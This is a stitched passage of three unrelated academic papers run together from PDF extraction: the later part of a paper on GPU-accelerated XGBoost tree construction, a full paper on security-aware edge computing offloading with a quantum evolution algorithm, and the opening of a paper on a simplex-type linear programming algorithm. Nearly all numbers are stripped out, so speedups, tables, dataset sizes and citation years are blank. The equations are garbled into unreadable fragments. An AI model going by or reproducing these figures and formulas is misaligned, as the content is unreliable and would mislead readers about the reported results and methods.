performed over the input feature to get the exclusive scan of gradient pairs. after scanning each tile, the split gain is calculated using the scan and reduction as input and the best splits are stored in shared memory. the segmented scan is formulated by performing an ordinary scan over key value pairs with a binary associative operator that resets the sum when the key changes. in this case the key is the current node bucket and the value is the gradient pair. the operator is shown in eq. ( ). opðakey; avalue; bkey; bvalueÞ ¼ ðbkey; bvalueÞ; if akey ¼ bkey ðbkey; avalue þ bvalueÞ; otherwise � ( ) an overview of the split finding algorithm for a single thread block processing a feature is provided in algorithm . the output of this algorithm, like that of the interleaved algorithm, consists of the best splits for each feature, and each node. this is reduced by a global kernel to find the best splits for each node, of any feature. algorithm interleaved algorithm—thread block execution . load input tile . multireduce tile gradient pairs . go to . until all tiles processed . return to first tile . load input tile . multiscan tile gradient pairs . scan tile for unique feature values . calculate gain for each split . store best split for each warp . go to . until all tiles processed . output best splits algorithm sorting algorithm split finding—thread block execution . load input tile . segmented reduction over tile gradient pairs . go to . until all tiles processed . return to first tile . load input tile . segmented scan over tile gradient pairs . calculate gain for each split . store best split for each warp . go to . until all tiles processed . output best splits mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. 
/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ phase : update node positions once the best splits for each node have been calculated, the node positions for each instance must be updated. this is made non-trivial because of the presence of missing values. we first create an array containing the pre-split node position of each training instance. these node positions are then updated as if they contained all missing values, according to the default missing direction in the newly calculated splits. we then update this array again based on the feature values of the instances. any instance which does not have a value for that feature (missing value) will have its node position left unchanged as per the missing direction. because we now have the updated node position for each instance, we write these node positions back to each feature value. to illustrate this with an example, fig. shows the state of a decision tree after having calculated splits for level . the node positions in the data structure used for split finding (table ) must be updated before proceeding to calculate the splits for level . to do this we update the array in table that maps instances to a node. first we update the node id map in the missing direction. all instances residing in node are updated in the right direction to node . instances residing in node are updated in the left direction to node . the node id map now looks like table . we now update the map again using the feature values from table , overwriting the previous values. instance resides in node so we check if f < . . this is true so instance moves down the left branch into node . instance moves into node and instance moves into node based on their f values. note that instance has a missing value for f . its node position is therefore kept as the missing direction updated in the previous step. this process is shown in table . the per instance node id array is now up-to-date for the new level so we write these values back into the per feature value array, giving table . phase : sort node buckets if the sorting version of the algorithm is used, the feature values need to be sorted by node position. if the interleaved version of the algorithm is used (e.g. in early tree levels) this step is unnecessary. each feature value with its updated node position is sorted such figure decision tree: four new leaves. mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ that each node bucket resides in contiguous memory. this is achieved using a segmented key/value radix sort. each feature represents a segment, the sort key is the node position and the feature value/instance id tuple is the value. we use the segmented radix sort function from the cub library. it delegates the sorting of each feature segment to a separate thread block. note that radix sorting is stable so the original sorted order of the feature values will be preserved within contiguous node buckets, after sorting with node position as the key. evaluation the performance and accuracy of the gpu tree construction algorithm for xgboost is evaluated on several large datasets and two different hardware configurations and also compared to cpu-based xgboost on a core intel processor. the hardware table per feature value array. f f node id instance id feature value . . . . . . . table node id map. instance id node id table updated missing direction. instance id node id table node id map: update based on feature value. 
instance id node id f f node id instance id feature value . . . . . . . table per feature value array: updated. f f node id instance id feature value . . . . . . . mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ configurations are described in table . on configuration # , where there is limited device memory, a subset of rows from each dataset is taken in order to fit within device memory. the datasets are described in table and parameters used for each dataset are shown in table . for the yltr dataset we use the supplied training/test split. for the higgs dataset we randomly select , , instances for the test set, as in chen & guestrin ( ). for the bosch dataset we randomly sample % of the instances for the test set and use the rest for the training set. we use boosting iterations for all datasets unless otherwise specified. this is a common real world setting that provides sufficiently long run-times for benchmarking. we set � (the learning rate) to . as the xgboost default of . is too high for the number of boosting iterations. for the yltr and bosch datasets we use the default tree depth of six because both of these datasets tend to generate small trees. the higgs dataset results in larger trees so we can set max depth to , allowing us to test performance for large trees. both the higgs and bosch datasets are binary classification problems so we use the binary:logistic objective function for xgboost. both higgs and bosch also exhibit highly imbalanced class distributions, so the auc (area under the table hardware configurations. configuration cpu ghz cores cpu arch. # intel i - . haswell # intel i - k . skylake # � intel xeon e - v . ivy bridge configuration gpu gpu memory (gb) gpu arch. # gtx maxwell # titan x pascal # – – – table datasets. dataset training instances test instances features yltr a , , higgs b , , , bosch c , , , notes: a https://webscope.sandbox.yahoo.com/catalog.php?datatype=c. b https://archive.ics.uci.edu/ml/datasets/higgs. c https://www.kaggle.com/c/bosch-production-line-performance/data. table parameters. dataset objective eval_metric max_depth eta boosting iterations yltr rank:ndcg ndcg@ . higgs binary:logistic auc . bosch binary:logistic auc . mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / https://webscope.sandbox.yahoo.com/catalog.php?datatype=c https://archive.ics.uci.edu/ml/datasets/higgs https://www.kaggle.com/c/bosch-production-line-performance/data http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ roc curve) evaluation metric is appropriate. for the yltr dataset we use the rank:ndcg objective and ndcg@ evaluation metric to be consistent with the evaluation from chen & guestrin ( ). all other xgboost parameters are left as the default values. accuracy in table , we show the accuracy of the gpu algorithm compared to the cpu version. we test on configuration # so use a subset of the training set to fit the data within device memory but use the full test set for accuracy evaluation. there is only minor variation in accuracy between the two algorithms. both algorithms are equivalent for the higgs dataset, the cpu algorithm is marginally more accurate for the yltr dataset and the gpu algorithm is marginally more accurate on the bosch dataset. in table , we also show the accuracy without using the interleaved version of the gpu algorithm. 
variations in accuracy are attributable to the interleaved version of the algorithm not choosing splits at the halfway point between two training examples, instead choosing the split value as the right most training example minus some constant. differences also occur due to floating point precision as discussed in ‘floating point precision.’ speed tables and show the relative speedup of the gpu algorithm compared to the cpu algorithm over boosting iterations. for configuration # with lower end desktop hardware, speed ups of between . � and . � are achieved. on configuration # with higher end desktop hardware but the same number of cores, speed ups of between . � and . � are achieved. the gtx used in configuration # must sample the datasets as they do not fit entirely in device memory. the titan x used in configuration # is able to fit all three datasets entirely into memory. figure shows the performance of the gpu algorithm across varying problem sizes using configuration # . the experiment is performed on subsets of the bosch dataset using boosting iterations. the gpu algorithm’s time increases linearly with respect to the number of input rows. it is approximately equal to the cpu algorithm at , table accuracy benchmarks. dataset subset metric cpu accuracy gpu accuracy yltr . ndcg@ . . higgs . auc . . bosch . auc . . table accuracy benchmarks—sorting version only. dataset subset metric gpu accuracy (sorting version only) yltr . ndcg@ . higgs . auc . bosch . auc . mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ rows and always faster thereafter for this dataset. this gives an idea of the minimum batch size at which the gpu algorithm begins to be effective. in fig. , we show the performance of the titan x from configuration # against configuration # (a high-end core server) on the yahoo dataset with boosting iterations and varying numbers of threads. each data point shows the average time of eight runs. error bars are too small to be visible at this scale. the titan x outperforms the core machine by approximately . �, even if the number of threads for the core machine is chosen optimally. interleaved algorithm performance in table and fig. , we show the effect of changing the threshold at which the algorithm switches between the interleaved version of the algorithm and the sorting version of the algorithm. timings are from boosting iterations on a % subset of the bosch dataset using configuration # . using the interleaved version of the algorithm shows benefits all the way up to the fifth level with a . � speed increase as compared to just using the sorting algorithm. after this depth temporary storage is insufficient to keep table configuration # speed benchmarks. dataset subset cpu time (s) gpu time (s) speedup yltr . , . higgs . , , . bosch . , . table configuration # speed benchmarks. dataset subset cpu time (s) gpu time (s) speedup yltr . . higgs . , , . bosch . , . figure bosch: time vs problem size. mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ using the interleaved approach. note that for the first level the interleaved algorithm and the sorting algorithm are equivalent as there is only one node bucket. surprisingly the interleaved algorithm is still faster than the sorting algorithm at level despite the fact that the multiscan and multireduce operations must sequentially iterate over = nodes at each step. 
this shows that executing instructions on elements figure yahoo ltr: n-threads vs time. table bosch dataset: interleaved levels. levels gpu time (s) accuracy speedup . . . . . . . . . . . . . . . . . . figure bosch: interleaved algorithm threshold. mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ held in registers or shared memory carries a very low cost relative to uncoalesced re-ordering of elements in device memory, as is performed when radix sorting. memory consumption we show the device memory consumption in table for all three benchmark datasets. each dataset can be fit entirely within the gb device memory of a titan x card. in table , we show the memory consumption of the original cpu algorithm for comparison. host memory consumption was evaluated using the valgrind massif (http://valgrind.org/docs/manual/msmanual.html) heap profiler tool. device memory usage was recorded programmatically using custom memory allocators. the device memory requirements are approximately twice that of the original cpu algorithm. this is because the cpu algorithm is able to process data in place, whereas the gpu algorithm requires sorting functions that are not in place and must maintain separate buffers for input and output. conclusion a highly practical gpu-accelerated tree construction algorithm is devised and evaluated within the xgboost library. the algorithm is built on top of efficient parallel primitives and switches between two modes of operation depending on tree depth. the ‘interleaved’ mode of operation shows that multiscan and multireduce operations with a limited number of buckets can be used to avoid expensive sorting operations at tree depths below six, resulting in speed increases of . � for the gpu implementation. the gpu algorithm provides speedups of between � and � over multicore cpus on desktop machines and a speed up of . � over � xeon cpus with cores. we see significant speedups for all parameters and datasets above a certain size, while providing an algorithm that is feature complete and able to handle sparse data. potential drawbacks of the algorithm are that the entire input matrix must fit in device memory and device memory consumption is approximately twice that of the host memory used by the cpu algorithm. despite this, we show that the algorithm is memory efficient enough to process the entire higgs dataset containing million instances and features on a single gb card. table memory: gpu algorithm. dataset device memory (gb) yltr . higgs . bosch . table memory: cpu algorithm. dataset host memory (gb) yltr . higgs . bosch . mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://valgrind.org/docs/manual/msmanual.html http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ our algorithm provides a practical means for xgboost users processing large data sets to significantly reduce processing times, showing that gradient boosting tasks are a good candidate for gpu-acceleration and are therefore no longer solely the domain of multicore cpus. additional information and declarations funding this research was supported by a marsden grant from the royal society of new zealand (uow ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: marsden grant from the royal society of new zealand: uow . 
competing interests eibe frank is an academic editor for peerj. author contributions � rory mitchell conceived and designed the experiments, performed the experiments, analysed the data, wrote the paper, prepared figures and/or tables, performed the computation work and reviewed drafts of the paper. � eibe frank conceived and designed the experiments, wrote the paper and reviewed drafts of the paper. data availability the following information was supplied regarding data availability: github: https://github.com/dmlc/xgboost/tree/master/plugin/updater_gpu references baxter s. . modern gpu—performance. available at https://moderngpu.github.io/ performance.html (accessed june ). blelloch ge. . prefix sums and their applications. technical report cmu-cs- - , school of computer science, carnegie mellon university. chen t, guestrin c. . xgboost: a scalable tree boosting system. in: proceedings of the nd acm sigkdd international conference on knowledge discovery and data mining. new york: acm, – . chiu c-c, luo g-h, yuan s-m. . a decision tree using cuda gpus. in: proceedings of the th international conference on information integration and web-based applications and services. new york: acm, – . coates a, huval b, wang t, wu d, catanzaro b, andrew n. . deep learning with cots hpc systems. in: proceedings of the th international conference on machine learning, jmlr.org, – . mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/dmlc/xgboost/tree/master/plugin/updater_gpu https://moderngpu.github.io/performance.html https://moderngpu.github.io/performance.html http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ eilers m. . multireduce and multiscan on modern gpus. master’s thesis, department of computer science, university of copenhagen. friedman j, hastie t, tibshirani r. . the elements of statistical learning. in: springer series in statistics. vol. . berlin: springer, – . grahn h, lavesson n, lapajne mh, slat d. . cudarf: a cuda-based implementation of random forests. in: proceedings of the th ieee/acs international conference on computer systems and applications, ieee computer society, – . hall m, frank e, holmes g, pfahringer b, reutemann p, witten ih. . the weka data mining software: an update. acm sigkdd explorations newsletter ( ): – doi . / . . harris m. . optimizing parallel reduction in cuda. available at http://developer.download. nvidia.com/assets/cuda/files/reduction.pdf (accessed march ). harris m. . how to access global memory efficiently in cuda c/c++ kernels. available at http://devblogs.nvidia.com/parallelforall/how-access-global-memory-efficiently-cuda-c-kernels/ (accessed november ). harris m, sengupta s, owens jd. . parallel prefix sum (scan) with cuda. gpu gems ( ): – . higham nj. . the accuracy of floating point summation. siam journal on scientific computing ( ): – doi . / . hillis wd, steele gl jr. . data parallel algorithms. communications of the acm ( ): – doi . / - - - - _ . hoberock j, bell n. . thrust: a parallel template library. available at https://thrust.github.io/. lo w-t, chang y-s, sheu r-k, chiu c-c, yuan s-m. . cudt: a cuda based decision tree algorithm. scientific world journal : – doi . / / . matloff n. . programming on parallel machines. available at http://heather.cs.ucdavis.edu/ ~matloff/ /pln/parprocbook.pdf. merrill d, grimshaw a. . high performance and scalable radix sorting: a case study of implementing dynamic parallelism for gpu computing. parallel processing letters ( ): – doi . /s . 
merrill d, nvidia-labs. . cuda unbound (cub) library. available at http://nvlabs.github. io/cub/. nasridinov a, lee y, park y-h. . decision tree construction on gpu: ubiquitous parallel computing approach. computing ( ): – doi . /s - - -z. nvidia. . block scan algorithms. available at http://nvlabs.github.io/cub/namespacecub. html#abec bba c e e d d ab (accessed december ). nvidia. . cuda c programming guide. available at http://docs.nvidia.com/cuda/index.html. quinlan jr. . c . : programs for machine learning. san francisco: elsevier. sharp t. . implementing decision trees and forests on a gpu. in: proceedings of the th european conference on computer vision. berlin: springer, – . strnad d, nerat a. . parallel construction of classification trees on a gpu. concurrency and computation: practice and experience ( ): – doi . /cpe. . mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / . http://developer.download.nvidia.com/assets/cuda/files/reduction.pdf http://developer.download.nvidia.com/assets/cuda/files/reduction.pdf http://devblogs.nvidia.com/parallelforall/how-access-global-memory-efficiently-cuda-c-kernels/ http://dx.doi.org/ . / http://dx.doi.org/ . / - - - - _ https://thrust.github.io/ http://dx.doi.org/ . / / http://heather.cs.ucdavis.edu/~matloff/ /pln/parprocbook.pdf http://heather.cs.ucdavis.edu/~matloff/ /pln/parprocbook.pdf http://dx.doi.org/ . /s http://nvlabs.github.io/cub/ http://nvlabs.github.io/cub/ http://dx.doi.org/ . /s - - -z http://nvlabs.github.io/cub/namespacecub.html#abec bba c e e d d ab http://nvlabs.github.io/cub/namespacecub.html#abec bba c e e d d ab http://docs.nvidia.com/cuda/index.html http://dx.doi.org/ . /cpe. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ accelerating the xgboost algorithm using gpu computing introduction background and related work parallel tree construction evaluation conclusion references international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - a study of edge computing offloading based on security luo pei school of computer science and engineering xi'an technological university xi'an, , china e-mail: @qq.com lei juchao school of computer science and engineering xi'an technological university xi'an, , china e-mail: @qq.com abstract—with the widespread use of iot scenario and the development of mobile network technology, the access to many devices at the edge of the network has generated an exponential increase in the volume of data, bringing higher than ever before the demand for data transmission bandwidth, traditional centralized cloud computing can no longer meet the demand, the need to adopt edge computing distributed collaborative approach to data processing. in this paper, we study a mobile edge computing model based on energy consumption optimization management under a certain delay constraint, focus on an edge computing offload scheme based on security management, and design an offload decision scheme based on a multi-objective optimization hybrid quantum evolution algorithm (mhqea) to ensure the security of user equipments during computing offload in the edge network and reduce total system energy consumption. keywords-edge computing; computing offloading; resource allocation i. 
introduction in recent years, with the rapid emergence of compute-intensive applications such as high-definition video, augmented reality/virtual reality, internet of things, internet of vehicles, and industrial internet, people have put forward higher demands on the transmission rate and service quality of the network, resulting in an explosive growth in network traffic. at the same time, mobile devices are gradually emerging, due to the increasingly powerful design features, mobile devices have limited computing power, poor real-time and energy consumption limitations, it is difficult to bear the needs of computation-intensive, latency-sensitive and high energy consumption applications, in order to meet these challenges, the first solution proposed is to apply compute offload technology in mobile cloud computing (mobile cloud computing (mcc)) architecture. by offloading the compute tasks of the terminal to a cloud data center with sufficient compute and storage resources, the delay and power consumption problems caused by the lack of computing power of the smart terminal can be alleviated to some extent. in order to solve the latency problem of mcc, researchers have focused on mobile edge computing, which is a core technology of g in [ ], it was proposed by the european telecommunications standardization institute (etsi) to provide computing, communication and storage capabilities closer to users by sinking cloud data centers to the wireless network edge. in mobile edge computing (mec) systems, network edge devices such as base stations, access points and routers are given cloud-like computing and storage capabilities to serve users as an alternative to the cloud. at the same time, because it is placed close to mobile device terminals and data sources, it can significantly reduce mobile device load and reduce transmission latency. among them, compute offloading, as a cutting-edge technology for edge computing, can be achieved by offloading compute tasks to a well- resourced edge cloud. the problem of computational offloading is mainly focused on offloading decisions and resource allocation, and many scholars have done relevant research on these issues. in the literature[ ], a one-dimensional search algorithm is used to minimize the latency target and optimize the user task execution latency based on the application queue buffer queue state. experimental results show that the optimal strategy proposed in this scheme can reduce the latency by up to % compared to the local execution strategy and up to % compared to the cloud execution strategy, which can effectively respond to the dynamic arrival of intensive applications; the user device in the literature[ ] adopts energy harvesting technique to optimize the energy consumption of the execution task, and proposes that the dynamic optimization algorithm can reduce the execution time by up to % by offloading the task to the mec, while preventing the offloader from being dropped. the shortcomings of both papers are that they do not consider the energy mailto:yangyh @qq.com mailto:yangyh @qq.com international journal of advanced network, monitoring and controls volume , no. , consumption of the user device, in the literature[ ], it is assumed that the user device utilizes energy harvesting techniques and the energy consumption of the user device is ignored in the decision making process, energy harvesting techniques do not completely solve the energy consumption problem. 
the literature[ ] investigates offload decisions during single-node computation, aiming not only to minimize execution latency but also to minimize the power consumption of edge computation. it considers dense user devices that can access multiple edge servers through nearby small nodes and proposes an optimal solution using an equivalent discrete framework; however, as the number of edge servers increases, this approach leads to high communication overhead and high computational complexity. the authors therefore address this problem with an application-assignment indexing scheme, in which each node broadcasts its own indexing policy and selects the most appropriate edge server to minimize execution latency and energy consumption. the downside of this scheme is that it does not consider scenarios with multiple compute nodes. the literature[ ] considers the joint optimization of energy consumption and latency of devices in a multi-user, multi-channel environment, where devices can tune performance by adjusting the weighting parameters; however, it assumes that the computational resources of the mec server are sufficient, whereas insufficient edge computing resources are common in realistic multi-user production environments. moreover, the above literature does not consider the impact of security issues on system performance. security issues such as privacy breaches may be encountered during the offloading process, so security is equally important in the study of edge computing offloading. unlike the aforementioned literature, this paper designs a secure computational offloading method. considering the impact of delay and energy consumption on the system, the resource allocation during task transfer and the offloading decision during task processing are jointly optimized to minimize the cost of mobile devices, with security added on top. the specific contributions are as follows:
1) design the mec network architecture and ensure its security.
2) minimize energy consumption under delay constraints through joint optimization to improve qoe.
3) propose an offloading-decision solving method based on the multi-objective optimization hybrid quantum evolution algorithm (mhqea).
4) show, through simulation and comparison with conventional algorithms, that the proposed scheme achieves a lower energy cost and lower total system energy consumption while guaranteeing system security.
ii. security-based mec computation offloading scheme
computation offloading moves the compute tasks of the user terminal to a cloud service, relieving the terminal's bottlenecks in compute performance, resource storage, and so on. computation offloading was first proposed for the cloud, and the emergence of mec has provided a new direction for its development. performing offloaded computation in mec not only relieves the pressure of high network resource usage but also reduces latency. therefore, the convergence of mec and computation offloading is an important direction for future network development.
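to make the offloading decision concrete before the formal model in the next subsection, the sketch below compares the local and offloaded cost of a single task in python. it is an illustration only: all names and values (cpu cycles, local frequency, transmit power, channel rate, the monitoring term) are placeholders rather than the paper's parameters, and the weighted delay-plus-energy cost merely mirrors the valuation functions defined below.

```python
# illustrative local-vs-offload comparison for one task; not the paper's model
# verbatim. parameter names and values are assumptions for the sketch.
from dataclasses import dataclass

@dataclass
class Task:
    data_bits: float      # input size to upload (bits)
    cpu_cycles: float     # cycles needed to finish the task

def local_cost(task, f_local, kappa, w_time=0.5, w_energy=0.5):
    """weighted delay and energy when the task runs on the device itself."""
    delay = task.cpu_cycles / f_local        # computation delay: cycles / local frequency
    energy = kappa * task.cpu_cycles         # energy factor per cycle
    return w_time * delay + w_energy * energy

def offload_cost(task, rate_bps, p_tx, f_mec, e_monitor, w_time=0.5, w_energy=0.5):
    """weighted delay and energy when the task is sent to the mec server; a
    fixed security-monitoring energy term is added, as in the scheme here."""
    t_up = task.data_bits / rate_bps         # transmission delay
    t_exec = task.cpu_cycles / f_mec         # server computation delay
    energy = p_tx * t_up + e_monitor         # upload energy + monitoring overhead
    return w_time * (t_up + t_exec) + w_energy * energy

task = Task(data_bits=2e6, cpu_cycles=1e9)
c_local = local_cost(task, f_local=1e9, kappa=1e-9)
c_off = offload_cost(task, rate_bps=20e6, p_tx=0.5, f_mec=10e9, e_monitor=0.05)
decision = "offload" if c_off < c_local else "run locally"   # one entry of the decision matrix
print(f"local={c_local:.3f}  offload={c_off:.3f}  ->  {decision}")
```

evaluating this comparison per device and per server is what the offloading decision matrix a encodes; the mhqea-based scheme described later searches over that matrix instead of deciding each task in isolation.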
in mobile edge computing, the edge cloud needs to process tasks from a variety of mobile terminals in real time, and needs to coordinate the distribution of edge server resources and task loads to meet the heterogeneous requirements of different tasks for processing delay, execution energy consumption and reliability. offload decision and resource allocation will directly affect the performance of computing offload in mobile edge computing, which has great research significance. a. security-based system model design although edge computing networks reduce request latency and core network pressure and improve network performance, but some problems in network security have been exposed, especially its distributed deployment mode leads to network security reduction, making dos attacks easier, therefore, how to ensure the security of edge computing becomes one of the problems facing edge computing networks. the system establishes a model of multi-user multi-edge computing services in a wireless network. it is assumed that each edge server has complete control over the channel gain, local calculation energy, and input data size of all end users. in daily life, the number of users is greater than the number of base stations set in the edge cloud. we assume that the mec system international journal of advanced network, monitoring and controls volume , no. , consists of m mobile users and n base stations that can be connected to the edge cloud. mobile core network security testing (routing control) resource allocation offloading decision wireless access network smart terminal mobile edge computing figure . security-based mobile edge computing network architecture b. design of unloading scheme for edge computing based on security the computational offloading technique in edge computing involves the offloading decision and resource allocation, etc. the offloading decision is optimized for the performance of different services, and in this paper, the offloading decision is carried out with minimum energy consumption under the delay constraint, and the resource allocation is considered after the decision is offloaded. ) network model we use c={c ,c ,... ,cn} to represent the different edge nodes, and the mec set of each edge node is represented as m={m ,m ,... .mp}, which provides computational offload for mobile terminals, and the ue set is denoted as n={n ,n ,... .nq}. ) offload decision model the offload decision model, as the core issue of computational offload techniques, is largely dependent on the computational task through the computing power of the device itself and the time delay and energy consumption that results when the offloading is completed to the edge. therefore, it is necessary to calculate and analyze the delay and energy consumed by local computing and edge computing to complete the computing task. the unloading decisions within each time slot are expressed in matrix form, i.e., the unloading decision matrix is represented by a, as in ( ).             mnn m aa aa a , , ... ......... ...  ( ) where, ∈ { , } denotes whether device n offloads the task to the edge server, = denotes local execution, and anyway denotes the task is offloaded to the edge server. each edge server can only handle one task at a time. thus the constraints are as in ( ). 
 a ,   n n mn  a ,   m m mn  ( ) ) local execution local execution means that user hands over task t to the mobile device for direct execution and the local execution of the task consumes mainly computational delay, as in ( ).  l n nl i i i f c t  n  ( ) where represents the cpu required to complete the task and represents the computing power of user n's mobile device. the energy consumption for the local execution of task t is mainly the energy consumption for processing computational tasks, as in ( ).  iii n l ce  nn   ( ) in the formula, indicates the energy consumption factor of the mobile device. according to formula ( ) and formula ( ), the locally executed valuation function is obtained as in ( ).  l n el n l n l iiiii etd nn      , , ,..  e n l n e n l n iiii ts    ( ) in the formula, used as the weight of the local execution time and energy consumption of the mn a , mn a , in c l ni f in  e n l n ii  , international journal of advanced network, monitoring and controls volume , no. , task, respectively, in order to determine the energy consumption of each user. ) mec server implementation the execution mode of the mec server refers to that the user n migrates the task t to a virtual machine on the mec server through a wireless channel for execution, and allocates computing and communication resources to the user equipment through the trust detection server. the delay of the entire calculation task is mainly transmission delay and calculation delay, as in ( ).  f h r b t i c i ii n   ( ) the data volume of the calculation result is much lower than the data input volume, so the transmission consumption of the calculation result is ignored. the energy consumption of the task t server mainly includes transmission energy consumption, mec server calculation energy consumption and server monitoring energy consumption, as in ( ).  monitor i n c n eh r b pe ii  i i   ( ) according to formula ( ) and formula ( ), the locally executed valuation function is obtained as ( ):    cn c n c n cc n iiii etd   ni  ( ) ) security inspection introduce a security module in the mec server to perform security checks on the offloading process. because the routing module is responsible for the traffic, and because edge nodes have limited capacity compared to cloud computing centers, they are vulnerable to traffic attacks, and although individual edge nodes are compromised and nearby networks quickly find replaceable nodes to adjust to, a malicious attack can bring down a server. therefore, traffic forwarding is divided into traffic types and firewalls are set up between the center and branches to enhance ddos protection. it also detects virtual machine operation in real time to prevent malicious virtual machine migration behavior. the security detection module mainly detects the offloaded computational tasks through entropy detection algorithm, which can detect anomalies sensitive to the information entropy of changes in network parameters and ue parameters. in the case of potentially malicious offloads, the mec controller transfers them to the security monitoring server, updates their trust values, labels them as trust violations, and verifies the user's access to the network through a combination of trust violation values and information entropy, increasing detection accuracy and reducing system overhead by unifying the monitoring of potentially malicious users. 
if there is any error in security detection, the defense policy module will continue to secure the network through reallocation of resources or security transfer. the entropy detection algorithm can accurately sense changes in network parameters and calculate the corresponding information entropy to detect whether a user is maliciously unloading. energy is consumed during the detection of offloading computational tasks, aiming at the minimum energy consumption under time constraints and based on a safe offloading scheme, where the attributes involved in the entropy detection algorithm are user trust, offloading frequency, network environment, cpu and memory utilization, etc. the distribution of the property z in g belongs to a polynomial distribution, and the probability equation is as in ( ).  z || || z z ! || )( g z g gp g zg       ( ) where, the set of attributes g={g ,g , ... ,g }( ≤ z ≤ ), a represents the proportion of users with attribute to the entire system users, can be calculated, we use the maximum threshold method to determine if there is an abnormal packet unloading, if it is greater than the set threshold, then it is a malicious unloading task, unloading is not allowed during the unloading decision. the entropy detection algorithm is as in ( ).     ,,n )log( i inin rrr  ( ) where is the detection threshold and unloading is determined by the detection result, as in ( ). z g  gin pr , h r n international journal of advanced network, monitoring and controls volume , no. ,        h n h nn n rr rr n , ,   ( ) detection of controlled energy consumption as in ( ).  c nn m rm e  monitor  ( ) represents the server's monitored energy consumption, represents the memory resources provided by the mec server for one user device, and represents the resources available for the entire server. the overall optimization function is expressed as in ( ):      ]- [min n c nn   n c c nn l ii ee           nn ccnn h n h nn n ff rr rr ts , n , , ..      ( ) in the constraint condition, f represents the total cpu computing resources of the mec server. the computing resources allocated by the mec cannot exceed the total computing resources. iii. algorithm designs in the security-based computing offload scenario, the problem is an np-hard problem because of the large data volume. to further solve this problem, this paper adopts a solution of mhqea to find an optimal approximation of the model, and the process of finding an optimal approximation is represented as algorithm . iv. simulation performance evaluation set the system time gap length to ms, calculate the local calculation energy consumption and unloading energy consumption by the total number of system user equipments , , , , , , respectively, and repeat each set of calculation times to take the average. as shown in figure . 
algorithm : a computational offloading algorithm based on mhqea begin the current iteration number t = , and the maximum iteration number is set to m initialize the offload decision matrix an(t) find the optimal solution matrix pn(t) by observing the state of an(t) through the make subroutine correction of pn(t) by reparation subroutine evaluate the total energy consumption of the system and find the optimal solution b(t) while(t<m)do begin number of current iterations t plus an(t- ) is observed by the make subalgorithm to determine the pn(t) evaluate pn(t) for the minimum total system energy consumption updating an(t) through the update subroutine find the optimal solution in pn(t) and b(t- ) to b if(current number of iterations meets migration conditions)then migration b to b(t) end if end end figure . relationship between offloading delay and total number of user equipments in different ways as can be seen from figure , the system energy consumption is higher for all local execution and all server execution, and the energy consumption is slightly higher for a security-based offload decision scheme than for an optimized energy-based offload monitor e n m c m e n e r g y c o n s u m p t i o n / j total number of user equipments all local implementation all server execution security-based computing offload computational offload with optimization as the goal international journal of advanced network, monitoring and controls volume , no. , scheme. because of the energy consumption required for security testing, it improves the overall security of the system and ensures the quality of service for the user's device unloading. the optimal energy-based delay and security- based delay are calculated using the total number of user equipments in the system , , , , and , respectively, and the average of each group is repeated times. as shown in figure . figure . relationship between different ways of offloading energy consumption and total number of user equipments as can be seen from figure , a security-based offloading decision scheme is better than an energy- optimized offloading scheme. v. conclusion in the article, an offloading scheme for edge computing under security is proposed, which minimizes the total overhead of the system and improves the security of the offloading process, and we use an mhqea-based algorithm to find the optimal offloading decision matrix. the simulation results show that the total system overhead for this option is lower than for other options, while maintaining safety. because mec servers are small data centers, each server has far less energy than a cloud data center. with the development of the industrial internet, mec servers will be heavily deployed, which will cause the overall energy consumption of the system, how to deal with the greater energy consumption is also something we should study in the future. references [ ] xie renchao, huang tao, yang fan, liu yunjie. principles and practice of edge computing [m]. beijing: people's publishing house, . - [ ] taleb t, samdanis k, mada b , et al. on multi-access edge computing: a survey of the emerging g network edge cloud architecture and orchestration[j]. communications surveys & tutorials, ieee, , ( ): - . [ ] liu j, mao y, zhang j, et al. delay-optimal computation task scheduling for mobile-edge computing systems[j]. . [ ] mao y, zhang j, letaief k b. dynamic computation offloading for mobile-edge computing with energy harvesting devices[j]. ieee journal on selected areas in communications, : - . 
[ ] guo x, singh r, zhao t, et al. an index based task assignment policy for achieving optimal power-delay tradeoff in edge cloud systems[c]//icc - ieee international conference on communications. ieee, . [ ] chen x, jiao l, li w, et al. efficient multi-user computation offloading for mobile-edge cloud computing[j].ieee/acm transactions on networking, : - . [ ] chen yanbing, li juan, zhang qi. exploration of quantum evolution algorithms for solving constrained multi-objective optimization problems[j]. electronic technology and software engineering, , ( ):p. - , . d e l a y / m s total number of user equipments security-based offload delay offload delay based on optimized energy consumption submitted december accepted february published march corresponding author charalampos p. tri- antafyllidis, charalam- pos.triantafyllidis@oncology.ox.ac.uk academic editor sándor szénási additional information and declarations can be found on page doi . /peerj-cs. copyright triantafyllidis and samaras distributed under creative commons cc-by . open access a new non-monotonic infeasible simplex- type algorithm for linear programming charalampos p. triantafyllidis and nikolaos samaras computational biology & integrative genomics, department of oncology, medical sciences division, university of oxford, oxford, united kingdom department of applied informatics, school of information sciences, university of macedonia, thessaloniki, greece abstract this paper presents a new simplex-type algorithm for linear programming with the following two main characteristics: (i) the algorithm computes basic solutions which are neither primal or dual feasible, nor monotonically improving and (ii) the sequence of these basic solutions is connected with a sequence of monotonically improving interior points to construct a feasible direction at each iteration. we compare the proposed algorithm with the state-of-the-art commercial cplex and gurobi primal-simplex optimizers on a collection of well known benchmarks. the results 